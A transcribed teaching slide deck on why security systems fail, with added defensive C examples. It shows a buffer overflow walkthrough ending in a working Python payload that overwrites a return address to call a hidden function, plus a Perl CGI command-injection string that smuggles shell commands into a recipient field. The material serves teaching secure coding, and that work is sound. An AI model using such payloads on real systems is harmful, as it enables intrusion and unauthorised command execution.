Busted! Why Security Systems Fail: Capability List

26 pages

Upload: jayson-newman

Post on 17-Jan-2016


Page 1: Busted !. Why Security Systems Fail Capability List

Busted !

Page 2

Why Security Systems Fail

Page 3

Page 4

Capability List

Page 5

Access Control List

Page 6

Two adjacent buffers, name[9] and degree[4], both zero-filled at first:

  name[9]:    00 00 00 00 00 00 00 00 00
  degree[4]:  00 00 00 00

strcpy(name, "charles");
strcpy(degree, "PhD");

  name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 's' 00 00
  degree[4]:  'P' 'h' 'D' 00

printf(name);
printf(degree);

Output:
  charles
  PhD

Page 7

strcpy(name, "charleton");    /* 9 characters plus the terminating 00: 10 bytes into name[9] */

  name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n'
  degree[4]:  00 00 00 00                 (the terminating 00 landed in degree[0])

strcpy(degree, "PhD");

  name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n'
  degree[4]:  'P' 'h' 'D' 00              (name's only terminator is now degree's 00)

printf(name);
printf(degree);

Output:
  charletonPhD
  PhD
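The two slides above show the overflow only as a picture. The following C program, added here as an example and not part of the original slides, replays the same strcpy() sequence on an emulated name[9]/degree[4] layout and runs a bounded copy beside it. Emulating both buffers inside one 13-byte array keeps every write inside a real C object, so the replay is deterministic rather than undefined behaviour while still producing the bytes the slide shows; the struct, the function names and the snprintf()-based bounded copy are this example's own choices.

```c
/* Added example, not from the slides: name[9]/degree[4] overflow replayed
 * on an emulated 13-byte layout, beside a bounded copy. */
#include <stdio.h>
#include <string.h>

#define NAME_SZ   9                      /* name[9] on the slide   */
#define DEGREE_SZ 4                      /* degree[4] on the slide */
#define LAYOUT_SZ (NAME_SZ + DEGREE_SZ)

/* bytes[0..9) is name, bytes[9..13) is degree: adjacent, as on the slide */
struct layout { char bytes[LAYOUT_SZ]; };
static struct layout g;                  /* scratch layout for the demos */

/* Unchecked copy, as strcpy() behaves: writes strlen(src)+1 bytes at 'off'
 * and spills past the field if src is too long. (Clamped to the emulated
 * region only so the emulation itself never leaves the array.) */
static void unchecked_copy(struct layout *m, size_t off, const char *src)
{
    size_t n = strlen(src) + 1;
    if (off + n > LAYOUT_SZ) n = LAYOUT_SZ - off;
    memcpy(m->bytes + off, src, n);
}

/* Bounded copy: never writes outside [off, off+cap) and always terminates.
 * Returns 0 when src fit, -1 when it had to be truncated. */
static int bounded_copy(struct layout *m, size_t off, size_t cap, const char *src)
{
    int w = snprintf(m->bytes + off, cap, "%s", src);
    return (w >= 0 && (size_t)w < cap) ? 0 : -1;
}

/* The slide's sequence: strcpy(name,"charleton"); strcpy(degree,"PhD"); */
static void replay_unchecked(struct layout *m)
{
    memset(m, 0, sizeof *m);
    unchecked_copy(m, 0, "charleton");   /* 10 bytes into the 9-byte field */
    unchecked_copy(m, NAME_SZ, "PhD");   /* overwrites the spilled terminator */
}

/* Same sequence with bounded copies; returns 1 if name was truncated. */
static int replay_bounded(struct layout *m)
{
    memset(m, 0, sizeof *m);
    int truncated = bounded_copy(m, 0, NAME_SZ, "charleton") != 0;
    bounded_copy(m, NAME_SZ, DEGREE_SZ, "PhD");
    return truncated;
}

/* What printing name / degree yields in each case. (The slide's printf(name)
 * also passes user data as the format string; print it with "%s" instead.) */
const char *overflow_name(void)    { replay_unchecked(&g); return g.bytes; }            /* "charletonPhD" */
const char *overflow_degree(void)  { replay_unchecked(&g); return g.bytes + NAME_SZ; }  /* "PhD" */
const char *bounded_name(void)     { replay_bounded(&g);   return g.bytes; }            /* "charleto" */
const char *bounded_degree(void)   { replay_bounded(&g);   return g.bytes + NAME_SZ; }  /* "PhD" */
int         bounded_name_truncated(void) { return replay_bounded(&g); }                 /* 1 */

int main(void)
{
    printf("unchecked: name=\"%s\" degree=\"%s\"\n", overflow_name(), overflow_degree());
    printf("bounded:   name=\"%s\" degree=\"%s\" (truncated=%d)\n",
           bounded_name(), bounded_degree(), bounded_name_truncated());
    return 0;
}
```

The bounded version loses the final character of "charleton" instead of corrupting the neighbouring field, and it reports the truncation so the caller can reject the input rather than silently shorten it.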

Page 8

Page 9

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void secret1(void)
{
    puts("You found the secret function No. 1!\n");
}

int main()
{
    char string[2];              /* two-byte buffer on the stack */
    puts("Input: ");
    scanf("%s", string);         /* unbounded read: writes until whitespace, whatever the buffer size */
    printf("You entered %s.\n", string);
    return 0;
}

Page 10

At startup of poof

0x0000000100000e52 <main+0>:   push   %rbp               /* entry to main() */
0x0000000100000e53 <main+1>:   mov    %rsp,%rbp
0x0000000100000e56 <main+4>:   sub    $0x10,%rsp
0x0000000100000e5a <main+8>:   lea    0x75(%rip),%rdi
0x0000000100000e61 <main+15>:  callq  0x100000ea4        /* puts() */
0x0000000100000e66 <main+20>:  lea    -0x10(%rbp),%rsi
0x0000000100000e6a <main+24>:  lea    0x6d(%rip),%rdi
0x0000000100000e71 <main+31>:  mov    $0x0,%eax
0x0000000100000e76 <main+36>:  callq  0x100000eaa        /* scanf() */
0x0000000100000e7b <main+41>:  lea    -0x10(%rbp),%rsi
0x0000000100000e7f <main+45>:  lea    0x5b(%rip),%rdi
0x0000000100000e86 <main+52>:  mov    $0x0,%eax
0x0000000100000e8b <main+57>:  callq  0x100000e9e        /* printf() */
0x0000000100000e90 <main+62>:  mov    $0x0,%eax
0x0000000100000e95 <main+67>:  leaveq
0x0000000100000e96 <main+68>:  retq

rip 0x000100000e52
rbp 0x7fff5fbff828
rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 11

At startup of poof

(disassembly of main() as on page 10)

rip 0x000100000e53
rbp 0x7fff5fbff828
rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 12

At startup of poof

(disassembly of main() as on page 10)

rip 0x000100000e53
rbp 0x7fff5fbff828
rsp 0x7fff5fbff828

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 13

At startup of poof

(disassembly of main() as on page 10)

rip 0x000100000e53
rbp 0x7fff5fbff828
rsp 0x7fff5fbff828

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 14

At startup of poof

(disassembly of main() as on page 10)

rip 0x000100000e53
rbp 0x7fff5fbff828
rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 15

Before call to puts()

(disassembly of main() as on page 10)

rip 0x000100000e61
rbp 0x7fff5fbff810
rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 16

Just inside of puts() (one instruction in, after the callq at main+15)

(disassembly of main() as on page 10)

rip 0x000100000ea4
rbp 0x7fff5fbff810
rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 17

Just after return from puts()

(disassembly of main() as on page 10)

rip 0x000100000e66
rbp 0x7fff5fbff810
rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 18

Just inside scanf() (one instruction in, after the callq at main+36)

(disassembly of main() as on page 10)

rip 0x000100000e66
rsi 0x7fff5fbff800
rbp 0x7fff5fbff810
rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 19

After return from scanf()

(disassembly of main() as on page 10)

rip 0x000100000e7b
rbp 0x7fff5fbff810
rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 20

Just before stack cleanup

(disassembly of main() as on page 10)

rip 0x000100000e95
rbp 0x7fff5fbff810
rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 21

And ready to return to the operating system?

(disassembly of main() as on page 10)

rip 0x000100000e96
rbp 0x414141414141
rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Page 22

0x0000000100000e40 <secret1+0>:   push   %rbp
0x0000000100000e41 <secret1+1>:   mov    %rsp,%rbp
0x0000000100000e44 <secret1+4>:   lea    0x65(%rip),%rdi          # 0x100000eb0
0x0000000100000e4b <secret1+11>:  callq  0x100000ea4 <dyld_stub_puts>
0x0000000100000e50 <secret1+16>:  leaveq
0x0000000100000e51 <secret1+17>:  retq

rip 0x000100000e40
rbp 0x414141414141
rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Hello secret1() !!!

Page 23

$ poof
Input:
A
You entered A.
$ cat poop
import struct
rip = 0x0000000100000e40
print("A"*24 + struct.pack("<q", rip))
$ python poop | poof
Input:
You entered AAAAAAAAAAAAAAAAAAAAAAAA@^N.
You found the secret function No. 1!
Segmentation fault
$
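The stack walk on pages 10 through 22 can be followed in code. The C program below is an added example, not the slides' own code or the course's: it decodes the saved return address from the 32 stack bytes the "After return from scanf()" slide shows (those byte values are copied from that slide) using the frame offsets the disassembly gives (string[] at rbp-0x10, the return address 8 bytes above the saved rbp), and it shows the bounded input read that keeps main()'s two-byte buffer from reaching either. The function names, the fgets()-based main() and its 256-byte line buffer are this example's assumptions.

```c
/* Added example, not from the slides: decode the frame the slides walk
 * through, and read input in a bounded way. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define BUF_OFFSET_FROM_RBP 0x10                       /* lea -0x10(%rbp),%rsi */
#define BYTES_TO_SAVED_RBP  (BUF_OFFSET_FROM_RBP)      /* 16: string[] to saved rbp */
#define BYTES_TO_RET_ADDR   (BUF_OFFSET_FROM_RBP + 8)  /* 24: string[] to return address */

/* 0x7fff5fbff800 .. 0x7fff5fbff81f, copied from the "After return from scanf()" slide */
static const uint8_t stack_after_scanf[32] = {
    0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,   /* 0x...800: string[2] and slack */
    0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,   /* 0x...808 */
    0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,   /* 0x...810: saved rbp */
    0x40,0x0e,0x00,0x00,0x01,0x00,0x00,0x00,   /* 0x...818: return address */
};

/* Little-endian 64-bit load, the way retq reads the return address. */
uint64_t le64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* The address retq will pop from the dumped frame: 0x100000e40, i.e. secret1. */
uint64_t return_address_in_dump(void)
{
    return le64(stack_after_scanf + BYTES_TO_RET_ADDR);
}

/* The fix for main(): copy at most dstsz-1 characters of one input line and
 * refuse anything longer, instead of scanf("%s"), which writes until
 * whitespace no matter how small the buffer is. 'line' is what arrived on
 * stdin. Returns 0 on success, -1 if the line would not fit (nothing copied). */
int read_bounded(char *dst, size_t dstsz, const char *line)
{
    size_t n = strcspn(line, "\n");            /* length of the first line */
    if (dstsz == 0 || n >= dstsz) return -1;   /* needs n+1 bytes incl. NUL */
    memcpy(dst, line, n);
    dst[n] = '\0';
    return 0;
}

/* Same 2-byte buffer as the slide's program, fed through read_bounded(). */
int accepts_one_line(const char *line)
{
    char string[2];
    return read_bounded(string, sizeof string, line);
}

int main(void)
{
    char line[256];                            /* assumed line buffer for fgets() */
    char string[2];
    printf("retq would jump to 0x%llx (%d bytes past string[])\n",
           (unsigned long long)return_address_in_dump(), BYTES_TO_RET_ADDR);
    puts("Input: ");
    if (!fgets(line, sizeof line, stdin)) return 1;
    if (read_bounded(string, sizeof string, line) != 0) {
        puts("Input too long, rejected.");
        return 1;
    }
    printf("You entered %s.\n", string);
    return 0;
}
```

With a two-byte buffer only a single character is accepted; anything longer is refused before any byte is written, so the 24 bytes of padding that reach the return address on the slides never get past the read.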

Page 24

#!/usr/bin/perl
# funky CGI script example
$dest = "foo1";   # pretend this is the destination address from the user
open (MAIL, "| /bin/cat >$dest ");   # pretend this was a call to sendmail
print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
close MAIL;

#!/usr/bin/perl
# funky CGI script example
$dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";
open (MAIL, "| /bin/cat >$dest ");   # pretend this was a call to sendmail
print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
close MAIL;

Page 25

#!/usr/bin/perl -w
# (1) quit unless we have the correct number of command-line args
$num_args = $#ARGV + 1;
if ($num_args != 2) {
    print "\nUsage: name.pl email-address brief-message\n";
    exit;
}

# (2) we got two command line args, so assume it's address
$dest = $ARGV[0];
$content = $ARGV[1];

my $sendmail = "/usr/sbin/sendmail -t";

#open (MAIL, "| /bin/cat >$dest ");   # pretend this was a call to sendmail
open (MAIL, "|$sendmail") or die "Cannot open sendmail: $!";

print MAIL "To: $dest\n";
print MAIL "From: me\n";
print MAIL "Subject: test\n";
print MAIL "Content-type: text/plain\n\n";
print MAIL $content;
close MAIL;

Run it with:

./tryit.pl ccpalmer "Some long message here inside quotes"

Could you find a way to trick the perl script into mailing you some file that it shouldn't???
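The two Perl scripts above put user input into a command line (page 24) and into mail headers handed to sendmail -t (page 25). The defensive counterpart, added here as an example and not part of the slides, is written in C to keep one language across this page's added examples. It makes two changes: the recipient is validated against a strict allowlist before use, and the mailer is started through fork()/execl() with the address as its own argv element, so no shell ever parses it and no newline can add a header. The sendmail path is the one the script uses; the allowlist, the function names and the exact sendmail arguments are this example's choices, not the script's.

```c
/* Added example, not from the slides: allowlist the recipient and invoke
 * the mailer without a shell. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define MAX_ADDR 254

/* Accept only plain address characters. Anything a shell could interpret
 * (';', '|', '$', quotes, whitespace, newlines) is rejected, and so is a
 * leading '-', which a mailer would parse as an option. Returns 1 if ok. */
int recipient_ok(const char *addr)
{
    size_t len = strlen(addr);
    if (len == 0 || len > MAX_ADDR || addr[0] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        char c = addr[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '.' || c == '_' ||
                 c == '-' || c == '@' || c == '+';
        if (!ok) return 0;
    }
    return 1;
}

/* Hand the message to sendmail over a pipe, with the recipient passed as a
 * separate argv element (no shell, no string interpolation).
 * Returns sendmail's exit status, or -1 on a local failure or bad address. */
int send_mail(const char *to, const char *content)
{
    if (!recipient_ok(to)) return -1;          /* validate before doing anything */
    int fds[2];
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                            /* child: stdin <- pipe, exec mailer */
        dup2(fds[0], STDIN_FILENO);
        close(fds[0]);
        close(fds[1]);
        execl("/usr/sbin/sendmail", "sendmail", "-i", to, (char *)NULL);
        _exit(127);                            /* only reached if exec failed */
    }
    close(fds[0]);
    FILE *mail = fdopen(fds[1], "w");
    if (!mail) { close(fds[1]); return -1; }
    fprintf(mail, "To: %s\nFrom: me\nSubject: test\nContent-type: text/plain\n\n%s\n",
            to, content);
    fclose(mail);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Same usage as the slide's tryit.pl: email-address brief-message */
int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "Usage: %s email-address brief-message\n", argv[0]);
        return 2;
    }
    if (!recipient_ok(argv[1])) {
        fprintf(stderr, "Rejected recipient: not a plain address\n");
        return 1;
    }
    return send_mail(argv[1], argv[2]) == 0 ? 0 : 1;
}
```

In Perl the equivalent is the list form of open() or system(), which passes arguments directly to the program instead of through /bin/sh, combined with the same allowlist check on $dest before it is used anywhere.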

Page 26